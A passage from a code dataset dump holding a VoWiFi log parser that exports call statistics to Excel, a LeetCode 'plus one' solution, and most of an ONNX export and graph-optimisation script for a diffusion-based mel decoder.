= None\r\n\r\n def findPid(self):\r\n '''\r\n description: process may restart, so pid is a list\r\n :return:\r\n '''\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n #start to find pid\r\n for index, process in enumerate(ProcessList):\r\n key = process.getkey()\r\n name = process.getname()\r\n plist = process.getpidlist()\r\n if pid not in self.pids and self.logutils.patterninline(key, line):\r\n self.logger.logger.info('found id ' + str(pid) + ' for ' + name)\r\n self.pids.append(pid)\r\n plist.append(pid)\r\n\r\n\r\n def parse(self):\r\n '''\r\n 1. pass pid lines\r\n 2. pattern match\r\n 3. pattern handler\r\n 4. draw the graph, csv,\r\n :return:\r\n '''\r\n #find all pids\r\n self.findPid()\r\n\r\n #handle each patten by pid\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n for index, process in enumerate(ProcessList):\r\n plist = process.getpidlist()\r\n pevent = process.getpevent()\r\n if pid in plist:\r\n #then we handle the event\r\n elist = pevent.geteventlist()\r\n for eindex, event in enumerate(elist):\r\n key = event['key']\r\n groupnum = event['groupnum']\r\n color = event['color']\r\n eventHandler = event['eventHandler']\r\n\r\n regex = re.compile(key)\r\n result = regex.search(line)\r\n if result:\r\n #redirect output\r\n with open(self.trimlog, 'a+') as trimlog:\r\n trimlog.write(line)\r\n\r\n #start to handle event, pass the mflow instance\r\n handlerobj = eventHandler(result, color, groupnum, mflow=self, fruit=fruit)\r\n eventdict = handlerobj.getret()\r\n\r\n def dumpcalllist(self):\r\n self.logger.logger.info('Totally Call number is ' + str(self.callnum))\r\n for cindex, call in enumerate(self.calllist):\r\n call.dumpcall()\r\n\r\n def gensummarysheet(self,sheet):\r\n # gen header\r\n sheet.title = \"Summary\"\r\n #header = ['No.', 'Codec', 'CVO/id', 'fps', 'Resolution', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n header = ['No.', 'Codec', 'CVO/id', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n sheet.append(header)\r\n for cindex, call in enumerate(self.calllist):\r\n onerow = list()\r\n onerow.append(cindex+1)\r\n # add codec info\r\n onerow.append(call.codec['name'] +'/' + call.codec['payload'])\r\n onerow.append(call.codec['cvo'] + '/' + call.codec['cvoid'])\r\n #onerow.append(call.camerainfo['minfps'] + '->' + call.camerainfo['maxfps'])\r\n #onerow.append(call.camerainfo['width'] + 'x' + call.camerainfo['height'])\r\n\r\n onerow.append(call.time['start'])\r\n onerow.append(call.time['end'])\r\n onerow.append(call.time['duration'])\r\n onerow.append(call.time['firstpps'])\r\n onerow.append(call.time['firstsps'])\r\n sheet.append(onerow)\r\n adjuctcolumnsize(sheet)\r\n\r\n def exportexcel(self):\r\n # generate sheet named by VT_Call_number_sendstat/recvstat\r\n wb = Workbook()\r\n self.gensummarysheet(wb.active)\r\n\r\n # the first sheet is always sendstat of call 1\r\n for cindex, call in enumerate(self.calllist):\r\n #one call will have two sheets: send, recv\r\n realindex = cindex + 1\r\n self.logger.logger.info('start to handle call ' + str(realindex))\r\n\r\n firstws = wb.create_sheet(title=call.sendsheettitle(realindex))\r\n secondws = wb.create_sheet(title=call.recvsheettitle(realindex))\r\n\r\n call.gensendsheet(firstws)\r\n adjuctcolumnsize(firstws)\r\n\r\n call.genrecvsheet(secondws)\r\n adjuctcolumnsize(secondws)\r\n\r\n wb.save(self.excel)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #mflow = mflow(logname=\"./samplelog/main.log\")\r\n mflow = mflow(logname=\"./samplelog/751978/mo.log\")\r\n mflow.parse()\r\n mflow.dumpcalllist()\r\n mflow.exportexcel()\r\n pass\r\n","repo_name":"deevarvar/myLab","sub_path":"sprd/vowifi/mengine_parser/mflow_parser.py","file_name":"mflow_parser.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1840038200","text":"def plusOne(digits):\n if digits[0] == 9:\n digits.insert(0, 0)\n for i in range(len(digits)-1, -1, -1):\n if digits[i] != 9:\n digits[i] += 1\n break\n else:\n digits[i] = 0\n if digits[0] == 0:\n digits.remove(0)\n return digits\n\n\ndigits = [9, 9, 9]\nprint(plusOne(digits))\n\ndigits2 = [9,8,7,6,5,4,3,2,1,0]\nprint(plusOne(digits2))","repo_name":"morozooff/leetCode-solutions","sub_path":"easy/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11384117849","text":"import os\nimport sys\n\n\nroot_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['PYTHONPATH'] = f'\"{root_dir}\"'\nsys.path.insert(0, root_dir)\n\n\nimport argparse\nimport math\nimport re\nimport struct\nfrom functools import partial\n\nimport numpy as np\nimport onnx\nimport onnxsim\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nfrom torch.nn import Linear\n\nfrom modules.commons.common_layers import Mish\nfrom src.diff.net import AttrDict\nfrom utils import load_ckpt\nfrom utils.hparams import hparams, set_hparams\n\n\ndef extract(a, t):\n return a[t].reshape((1, 1, 1, 1))\n\n\ndef linear_beta_schedule(timesteps, max_beta=hparams.get('max_beta', 0.01)):\n \"\"\"\n linear schedule\n \"\"\"\n betas = np.linspace(1e-4, max_beta, timesteps)\n return betas\n\n\ndef cosine_beta_schedule(timesteps, s=0.008):\n \"\"\"\n cosine schedule\n as proposed in https://openreview.net/forum?id=-NEXDKk8gZ\n \"\"\"\n steps = timesteps + 1\n x = np.linspace(0, steps, steps)\n alphas_cumprod = np.cos(((x / steps) + s) / (1 + s) * np.pi * 0.5) ** 2\n alphas_cumprod = alphas_cumprod / alphas_cumprod[0]\n betas = 1 - (alphas_cumprod[1:] / alphas_cumprod[:-1])\n return np.clip(betas, a_min=0, a_max=0.999)\n\n\nbeta_schedule = {\n \"cosine\": cosine_beta_schedule,\n \"linear\": linear_beta_schedule,\n}\n\n\nclass SinusoidalPosEmb(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n half_dim = dim // 2\n emb = math.log(10000) / (half_dim - 1)\n self.register_buffer('emb', torch.exp(torch.arange(half_dim) * torch.tensor(-emb)).unsqueeze(0))\n\n def forward(self, x):\n emb = self.emb * x\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\nclass KaimingNormalConv1d(nn.Conv1d):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n nn.init.kaiming_normal_(self.weight)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, encoder_hidden, residual_channels, dilation):\n super().__init__()\n self.residual_channels = residual_channels\n self.dilated_conv = KaimingNormalConv1d(\n residual_channels,\n 2 * residual_channels,\n 3,\n padding=dilation,\n dilation=dilation)\n self.diffusion_projection = Linear(residual_channels, residual_channels)\n self.conditioner_projection = KaimingNormalConv1d(encoder_hidden, 2 * residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(residual_channels, 2 * residual_channels, 1)\n\n def forward(self, x, conditioner, diffusion_step):\n diffusion_step = self.diffusion_projection(diffusion_step).unsqueeze(-1)\n conditioner = self.conditioner_projection(conditioner)\n y = x + diffusion_step\n\n y = self.dilated_conv(y) + conditioner\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n gate, filter = torch.split(y, [self.residual_channels, self.residual_channels], dim=1)\n\n y = torch.sigmoid(gate) * torch.tanh(filter)\n y = self.output_projection(y)\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n residual, skip = torch.split(y, [self.residual_channels, self.residual_channels], dim=1)\n\n return (x + residual) / math.sqrt(2.0), skip\n\n\nclass DiffNet(nn.Module):\n def __init__(self, in_dims=80):\n super().__init__()\n self.params = params = AttrDict(\n # Model params\n encoder_hidden=hparams['hidden_size'],\n residual_layers=hparams['residual_layers'],\n residual_channels=hparams['residual_channels'],\n dilation_cycle_length=hparams['dilation_cycle_length'],\n )\n self.input_projection = KaimingNormalConv1d(in_dims, params.residual_channels, 1)\n self.diffusion_embedding = SinusoidalPosEmb(params.residual_channels)\n dim = params.residual_channels\n self.mlp = nn.Sequential(\n nn.Linear(dim, dim * 4),\n Mish(),\n nn.Linear(dim * 4, dim)\n )\n self.residual_layers = nn.ModuleList([\n ResidualBlock(params.encoder_hidden, params.residual_channels, 2 ** (i % params.dilation_cycle_length))\n for i in range(params.residual_layers)\n ])\n self.skip_projection = KaimingNormalConv1d(params.residual_channels, params.residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(params.residual_channels, in_dims, 1)\n nn.init.zeros_(self.output_projection.weight)\n\n # TODO: swap order of `diffusion_steps` and `cond`\n def forward(self, spec, diffusion_step, cond):\n \"\"\"\n\n :param spec: [B, 1, M, T]\n :param diffusion_step: [B, 1]\n :param cond: [B, M, T]\n :return:\n \"\"\"\n x = spec.squeeze(1)\n x = self.input_projection(x) # [B, residual_channel, T]\n\n x = functional.relu(x)\n diffusion_step = diffusion_step.float()\n diffusion_step = self.diffusion_embedding(diffusion_step)\n diffusion_step = self.mlp(diffusion_step)\n\n # Avoid ConstantOfShape op\n x, skip = self.residual_layers[0](x, cond, diffusion_step)\n # noinspection PyTypeChecker\n for layer in self.residual_layers[1:]:\n x, skip_connection = layer.forward(x, cond, diffusion_step)\n skip += skip_connection\n\n x = skip / math.sqrt(len(self.residual_layers))\n\n x = self.skip_projection(x)\n x = functional.relu(x)\n x = self.output_projection(x) # [B, mel_bins, T]\n return x.unsqueeze(1)\n\n\nclass NaiveNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('clip_min', to_torch(-1.))\n self.register_buffer('clip_max', to_torch(1.))\n\n def forward(self, x, noise_pred, t):\n x_recon = (\n extract(self.sqrt_recip_alphas_cumprod, t) * x -\n extract(self.sqrt_recipm1_alphas_cumprod, t) * noise_pred\n )\n x_recon = torch.clamp(x_recon, min=self.clip_min, max=self.clip_max)\n\n model_mean = (\n extract(self.posterior_mean_coef1, t) * x_recon +\n extract(self.posterior_mean_coef2, t) * x\n )\n model_log_variance = extract(self.posterior_log_variance_clipped, t)\n noise = torch.randn_like(x)\n # no noise when t == 0\n nonzero_mask = ((t > 0).float()).reshape(1, 1, 1, 1)\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n\nclass PLMSNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n # Below are buffers for TorchScript to pass jit compilation.\n self.register_buffer('_1', to_torch(1))\n self.register_buffer('_2', to_torch(2))\n self.register_buffer('_3', to_torch(3))\n self.register_buffer('_5', to_torch(5))\n self.register_buffer('_9', to_torch(9))\n self.register_buffer('_12', to_torch(12))\n self.register_buffer('_16', to_torch(16))\n self.register_buffer('_23', to_torch(23))\n self.register_buffer('_24', to_torch(24))\n self.register_buffer('_37', to_torch(37))\n self.register_buffer('_55', to_torch(55))\n self.register_buffer('_59', to_torch(59))\n\n def forward(self, x, noise_t, t, t_prev):\n a_t = extract(self.alphas_cumprod, t)\n a_prev = extract(self.alphas_cumprod, t_prev)\n a_t_sq, a_prev_sq = a_t.sqrt(), a_prev.sqrt()\n\n x_delta = (a_prev - a_t) * ((self._1 / (a_t_sq * (a_t_sq + a_prev_sq))) * x - self._1 / (\n a_t_sq * (((self._1 - a_prev) * a_t).sqrt() + ((self._1 - a_t) * a_prev).sqrt())) * noise_t)\n x_pred = x + x_delta\n\n return x_pred\n\n def predict_stage0(self, noise_pred, noise_pred_prev):\n return (noise_pred\n + noise_pred_prev) / self._2\n\n def predict_stage1(self, noise_pred, noise_list):\n return (noise_pred * self._3\n - noise_list[-1]) / self._2\n\n def predict_stage2(self, noise_pred, noise_list):\n return (noise_pred * self._23\n - noise_list[-1] * self._16\n + noise_list[-2] * self._5) / self._12\n\n def predict_stage3(self, noise_pred, noise_list):\n return (noise_pred * self._55\n - noise_list[-1] * self._59\n + noise_list[-2] * self._37\n - noise_list[-3] * self._9) / self._24\n\n\nclass MelExtractor(nn.Module):\n def __init__(self, spec_min, spec_max, keep_bins):\n super().__init__()\n\n def forward(self, x):\n x = x.squeeze(1).permute(0, 2, 1)\n d = (self.spec_max - self.spec_min) / 2\n m = (self.spec_max + self.spec_min) / 2\n return x * d + m\n\n\nclass GaussianDiffusion(nn.Module):\n def __init__(self, out_dims, timesteps=1000, k_step=1000, spec_min=None, spec_max=None):\n super().__init__()\n self.mel_bins = out_dims\n self.K_step = k_step\n\n self.denoise_fn = DiffNet(out_dims)\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n if 'schedule_type' in hparams.keys():\n betas = beta_schedule[hparams['schedule_type']](timesteps)\n else:\n betas = cosine_beta_schedule(timesteps)\n\n # Below are buffers for state_dict to load into.\n alphas = 1. - betas\n alphas_cumprod = np.cumprod(alphas, axis=0)\n alphas_cumprod_prev = np.append(1., alphas_cumprod[:-1])\n\n timesteps, = betas.shape\n self.num_timesteps = int(timesteps)\n\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('alphas_cumprod', to_torch(alphas_cumprod))\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod)))\n self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod - 1)))\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n posterior_variance = betas * (1. - alphas_cumprod_prev) / (1. - alphas_cumprod)\n # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)\n # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain\n self.register_buffer('posterior_log_variance_clipped', to_torch(np.log(np.maximum(posterior_variance, 1e-20))))\n self.register_buffer('posterior_mean_coef1', to_torch(\n betas * np.sqrt(alphas_cumprod_prev) / (1. - alphas_cumprod)))\n self.register_buffer('posterior_mean_coef2', to_torch(\n (1. - alphas_cumprod_prev) * np.sqrt(alphas) / (1. - alphas_cumprod)))\n\n self.register_buffer('spec_min', torch.FloatTensor(spec_min)[None, None, :hparams['keep_bins']])\n self.register_buffer('spec_max', torch.FloatTensor(spec_max)[None, None, :hparams['keep_bins']])\n\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n def build_submodules(self):\n # Move registered buffers into submodules after loading state dict.\n self.naive_noise_predictor.register_buffer('sqrt_recip_alphas_cumprod', self.sqrt_recip_alphas_cumprod)\n self.naive_noise_predictor.register_buffer('sqrt_recipm1_alphas_cumprod', self.sqrt_recipm1_alphas_cumprod)\n self.naive_noise_predictor.register_buffer(\n 'posterior_log_variance_clipped', self.posterior_log_variance_clipped)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef1', self.posterior_mean_coef1)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef2', self.posterior_mean_coef2)\n self.plms_noise_predictor.register_buffer('alphas_cumprod', self.alphas_cumprod)\n self.mel_extractor.register_buffer('spec_min', self.spec_min)\n self.mel_extractor.register_buffer('spec_max', self.spec_max)\n del self.sqrt_recip_alphas_cumprod\n del self.sqrt_recipm1_alphas_cumprod\n del self.posterior_log_variance_clipped\n del self.posterior_mean_coef1\n del self.posterior_mean_coef2\n del self.alphas_cumprod\n del self.spec_min\n del self.spec_max\n\n def forward(self, condition, speedup):\n device = condition.device\n condition = condition.transpose(1, 2) # (1, n_frames, 256) => (1, 256, n_frames)\n\n n_frames = condition.shape[2]\n step_range = torch.arange(0, self.K_step, speedup, dtype=torch.long, device=device).flip(0)\n x = torch.randn((1, 1, self.mel_bins, n_frames), device=device)\n\n if speedup > 1:\n plms_noise_stage = torch.tensor(0, dtype=torch.long, device=device)\n noise_list = torch.zeros((0, 1, 1, self.mel_bins, n_frames), device=device)\n for t in step_range:\n noise_pred = self.denoise_fn(x, t, condition)\n t_prev = t - speedup\n t_prev = t_prev * (t_prev > 0)\n\n if plms_noise_stage == 0:\n x_pred = self.plms_noise_predictor(x, noise_pred, t, t_prev)\n noise_pred_prev = self.denoise_fn(x_pred, t_prev, condition)\n noise_pred_prime = self.plms_noise_predictor.predict_stage0(noise_pred, noise_pred_prev)\n elif plms_noise_stage == 1:\n noise_pred_prime = self.plms_noise_predictor.predict_stage1(noise_pred, noise_list)\n elif plms_noise_stage == 2:\n noise_pred_prime = self.plms_noise_predictor.predict_stage2(noise_pred, noise_list)\n else:\n noise_pred_prime = self.plms_noise_predictor.predict_stage3(noise_pred, noise_list)\n\n noise_pred = noise_pred.unsqueeze(0)\n if plms_noise_stage < 3:\n noise_list = torch.cat((noise_list, noise_pred), dim=0)\n plms_noise_stage = plms_noise_stage + 1\n else:\n noise_list = torch.cat((noise_list[-2:], noise_pred), dim=0)\n\n x = self.plms_noise_predictor(x, noise_pred_prime, t, t_prev)\n\n # from dpm_solver import NoiseScheduleVP, model_wrapper, DpmSolver\n # ## 1. Define the noise schedule.\n # noise_schedule = NoiseScheduleVP(betas=self.betas)\n #\n # ## 2. Convert your discrete-time `model` to the continuous-time\n # # noise prediction model. Here is an example for a diffusion model\n # ## `model` with the noise prediction type (\"noise\") .\n #\n # model_fn = model_wrapper(\n # self.denoise_fn,\n # noise_schedule,\n # model_kwargs={\"cond\": condition}\n # )\n #\n # ## 3. Define dpm-solver and sample by singlestep DPM-Solver.\n # ## (We recommend singlestep DPM-Solver for unconditional sampling)\n # ## You can adjust the `steps` to balance the computation\n # ## costs and the sample quality.\n # dpm_solver = DpmSolver(model_fn, noise_schedule)\n #\n # steps = t // hparams[\"pndm_speedup\"]\n # x = dpm_solver.sample(x, steps=steps)\n else:\n for t in step_range:\n pred = self.denoise_fn(x, t, condition)\n x = self.naive_noise_predictor(x, pred, t)\n\n mel = self.mel_extractor(x)\n return mel\n\n\nclass DiffDecoder(nn.Module):\n def __init__(self, device):\n super().__init__()\n self.model = build_model()\n self.model.eval()\n self.model.to(device)\n\n def forward(self, condition, speedup):\n mel = self.model.forward(condition, speedup) # (1, n_frames, mel_bins)\n return mel\n\n\ndef build_model():\n model = GaussianDiffusion(\n out_dims=hparams['audio_num_mel_bins'],\n timesteps=hparams['timesteps'],\n k_step=hparams['K_step'],\n spec_min=hparams['spec_min'],\n spec_max=hparams['spec_max'],\n )\n model.eval()\n load_ckpt(model, hparams['work_dir'], 'model', strict=False)\n model.build_submodules()\n return model\n\n\ndef _fix_cast_nodes(graph, logs=None):\n if logs is None:\n logs = []\n for sub_node in graph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(branch, logs)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(body, logs)\n elif sub_node.op_type == 'Cast':\n for i, sub_attr in enumerate(sub_node.attribute):\n if sub_attr.name == 'to':\n to = onnx.helper.get_attribute_value(sub_attr)\n if to == onnx.TensorProto.DOUBLE:\n float32 = onnx.helper.make_attribute('to', onnx.TensorProto.FLOAT)\n sub_node.attribute.remove(sub_attr)\n sub_node.attribute.insert(i, float32)\n logs.append(sub_node.name)\n break\n return logs\n\n\ndef _fold_shape_gather_equal_if_to_squeeze(graph, subgraph, logs=None):\n if logs is None:\n logs = []\n\n # Do folding in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, branch, logs)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, body, logs)\n\n # Do folding in current graph.\n i_shape = 0\n while i_shape < len(subgraph.node):\n if subgraph.node[i_shape].op_type == 'Shape':\n shape_node = subgraph.node[i_shape]\n shape_out = shape_node.output[0]\n i_gather = i_shape + 1\n while i_gather < len(subgraph.node):\n if subgraph.node[i_gather].op_type == 'Gather' and subgraph.node[i_gather].input[0] == shape_out:\n gather_node = subgraph.node[i_gather]\n gather_out = gather_node.output[0]\n i_equal = i_gather + 1\n while i_equal < len(subgraph.node):\n if subgraph.node[i_equal].op_type == 'Equal' and (\n subgraph.node[i_equal].input[0] == gather_out\n or subgraph.node[i_equal].input[1] == gather_out):\n equal_node = subgraph.node[i_equal]\n equal_out = equal_node.output[0]\n i_if = i_equal + 1\n while i_if < len(subgraph.node):\n if subgraph.node[i_if].op_type == 'If' and subgraph.node[i_if].input[0] == equal_out:\n # Found the substructure to be folded.\n if_node = subgraph.node[i_if]\n # Search and clean initializer values.\n squeeze_axes_tensor = None\n for tensor in subgraph.initializer:\n if tensor.name == gather_node.input[1]:\n squeeze_axes_tensor = tensor\n subgraph.initializer.remove(tensor)\n elif tensor.name == equal_node.input[1]:\n subgraph.initializer.remove(tensor)\n # Create 'Squeeze' node.\n squeeze_node = onnx.helper.make_node(\n op_type='Squeeze',\n inputs=shape_node.input,\n outputs=if_node.output\n )\n squeeze_axes = onnx.helper.make_attribute(\n key='axes',\n value=[struct.unpack('q', squeeze_axes_tensor.raw_data)[0]] # unpack int64\n )\n squeeze_node.attribute.extend([squeeze_axes])\n # Replace 'Shape', 'Gather', 'Equal', 'If' with 'Squeeze'.\n subgraph.node.insert(i_shape, squeeze_node)\n subgraph.node.remove(shape_node)\n subgraph.node.remove(gather_node)\n subgraph.node.remove(equal_node)\n subgraph.node.remove(if_node)\n logs.append((shape_node.name, gather_node.name, equal_node.name, if_node.name))\n break\n i_if += 1\n else:\n break\n i_equal += 1\n else:\n break\n i_gather += 1\n else:\n break\n i_shape += 1\n return logs\n\n\ndef _extract_conv_nodes(graph, weight_pattern, alias_prefix):\n node_dict = {} # key: pattern match, value: (alias, node)\n logs = []\n\n def _extract_conv_nodes_recursive(subgraph):\n to_be_removed = []\n for sub_node in subgraph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(branch)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(body)\n elif sub_node.op_type == 'Conv' and re.match(weight_pattern, sub_node.input[1]):\n # Found node to extract\n cached = node_dict.get(sub_node.input[1])\n if cached is None:\n out_alias = f'{alias_prefix}.{len(node_dict)}'\n node_dict[sub_node.input[1]] = (out_alias, sub_node)\n else:\n out_alias = cached[0]\n out = sub_node.output[0]\n # Search for nodes downstream the extracted node and match them to the renamed output\n for dep_node in subgraph.node:\n for dep_idx, dep_input in enumerate(dep_node.input):\n if dep_input == out:\n dep_node.input.remove(out)\n dep_node.input.insert(dep_idx, out_alias)\n # Add the node to the remove list\n to_be_removed.append(sub_node)\n logs.append(sub_node.name)\n [subgraph.node.remove(_n) for _n in to_be_removed]\n\n for i, n in enumerate(graph.node):\n if n.op_type == 'If':\n for a in n.attribute:\n b = onnx.helper.get_attribute_value(a)\n _extract_conv_nodes_recursive(b)\n for key in reversed(node_dict):\n alias, node = node_dict[key]\n # Rename output of the node\n out_name = node.output[0]\n node.output.remove(node.output[0])\n node.output.insert(0, alias)\n # Insert node into the main graph\n graph.node.insert(i, node)\n # Rename value info of the output\n for v in graph.value_info:\n if v.name == out_name:\n v.name = alias\n break\n break\n return logs\n\n\ndef _remove_unused_values(graph):\n used_values = set()\n cleaned_values = []\n\n def _record_usage_recursive(subgraph):\n for node in subgraph.node:\n # For 'If' and 'Loop' nodes, do recording recursively\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(body)\n # For each node, record its inputs and outputs\n for input_value in node.input:\n used_values.add(input_value)\n for output_value in node.output:\n used_values.add(output_value)\n\n def _clean_unused_recursively(subgraph):\n # Do cleaning in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(body)\n\n # Do cleaning in current graph.\n i = 0\n while i < len(subgraph.initializer):\n if subgraph.initializer[i].name not in used_values:\n cleaned_values.append(subgraph.initializer[i].name)\n subgraph.initializer.remove(subgraph.initializer[i])\n else:\n i += 1\n i = 0\n while i < len(subgraph.value_info):\n if subgraph.value_info[i].name not in used_values:\n cleaned_values.append(subgraph.value_info[i].name)\n subgraph.value_info.remove(subgraph.value_info[i])\n else:\n i += 1\n\n _record_usage_recursive(graph)\n _clean_unused_recursively(graph)\n return cleaned_values\n\n\ndef fix(src, target):\n model = onnx.load(src)\n\n # The output dimension are wrongly hinted by TorchScript\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n out_dims.remove(out_dims[1])\n out_dims.insert(1, in_dims[1])\n print(f'| annotate output: \\'{model.graph.output[0].name}\\'')\n\n # Fix 'Cast' nodes in sub-graphs that wrongly cast tensors to float64\n fixed_casts = _fix_cast_nodes(model.graph)\n print('| fix node(s): ')\n for i, log in enumerate(fixed_casts):\n if i == len(fixed_casts) - 1:\n end = '\\n'\n elif i % 10 == 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #1 of the simplifier to fix missing value info and type hints and remove unnecessary 'Cast'.\n print('Running ONNX simplifier...')\n model, check = onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n\n then_branch = None\n for node in model.graph.node:\n if node.op_type == 'If':\n # Add type hint to let the simplifier fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze'\n if_out = node.output[0]\n for info in model.graph.value_info:\n if info.name == if_out:\n if_out_dim = info.type.tensor_type.shape.dim\n while len(if_out_dim) > 0:\n if_out_dim.remove(if_out_dim[0])\n if_out_dim.insert(0, in_dims[0]) # batch_size\n if_out_dim.insert(1, in_dims[0]) # 1\n if_out_dim.insert(2, out_dims[2]) # mel_bins\n if_out_dim.insert(3, in_dims[1]) # n_frames\n print(f'| annotate node: \\'{node.name}\\'')\n\n # Manually fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze' in sub-graphs\n folded_groups = []\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n folded_groups += _fold_shape_gather_equal_if_to_squeeze(model.graph, branch)\n if attr.name == 'then_branch':\n # Save branch for future use\n then_branch = branch\n print('| fold node group(s): ')\n print(', '.join(['[' + ', '.join([f'\\'{n}\\'' for n in log]) + ']' for log in folded_groups]))\n break\n\n # Optimize 'Concat' nodes for shapes\n concat_node = None\n shape_prefix_name = 'noise.shape.prefix'\n list_length_name = 'list.length'\n for node in model.graph.node:\n if node.op_type == 'Concat':\n concat_node = node\n for i, ini in enumerate(model.graph.initializer):\n if ini.name == node.input[0]:\n shape_prefix = onnx.helper.make_tensor(\n name=shape_prefix_name,\n data_type=onnx.TensorProto.INT64,\n dims=(3,),\n vals=[out_dims[0].dim_value, 1, out_dims[2].dim_value]\n )\n list_length = onnx.helper.make_tensor(\n name=list_length_name,\n data_type=onnx.TensorProto.INT64,\n dims=(1,),\n vals=[0]\n )\n model.graph.initializer.extend([shape_prefix, list_length])\n break\n for i in range(3):\n node.input.remove(node.input[0])\n node.input.insert(0, shape_prefix_name)\n print(f'| optimize node: \\'{node.name}\\'')\n break\n for node in then_branch.node:\n if node.op_type == 'Concat':\n concat_inputs = list(node.input)\n dep_nodes = []\n for dep_node in then_branch.node:\n if dep_node.op_type == 'Unsqueeze' and dep_node.output[0] in concat_inputs:\n dep_nodes.append(dep_node)\n [then_branch.node.remove(d_n) for d_n in dep_nodes]\n while len(node.input) > 0:\n node.input.remove(node.input[0])\n node.input.extend([list_length_name, concat_node.output[0]])\n print(f'| optimize node: \\'{node.name}\\'')\n break\n\n # Extract 'Conv' nodes and cache results of conditioner projection\n # of each residual layer from loop bodies to improve performance.\n extracted_convs = _extract_conv_nodes(\n model.graph,\n r'model\\.denoise_fn\\.residual_layers\\.\\d+\\.conditioner_projection\\.weight',\n 'cache'\n )\n\n print(f'| extract node(s):')\n for i, log in enumerate(extracted_convs):\n if i == len(extracted_convs) - 1:\n end = '\\n'\n elif i % 10 == 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Remove unused initializers and value infos\n cleaned_values = _remove_unused_values(model.graph)\n print(f'| clean value(s):')\n for i, log in enumerate(cleaned_values):\n if i == len(cleaned_values) - 1:\n end = '\\n'\n elif i % 15 == 14:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #2 of the simplifier to further optimize the graph and reduce dangling sub-graphs.\n print('Running ONNX simplifier...')\n model, check = 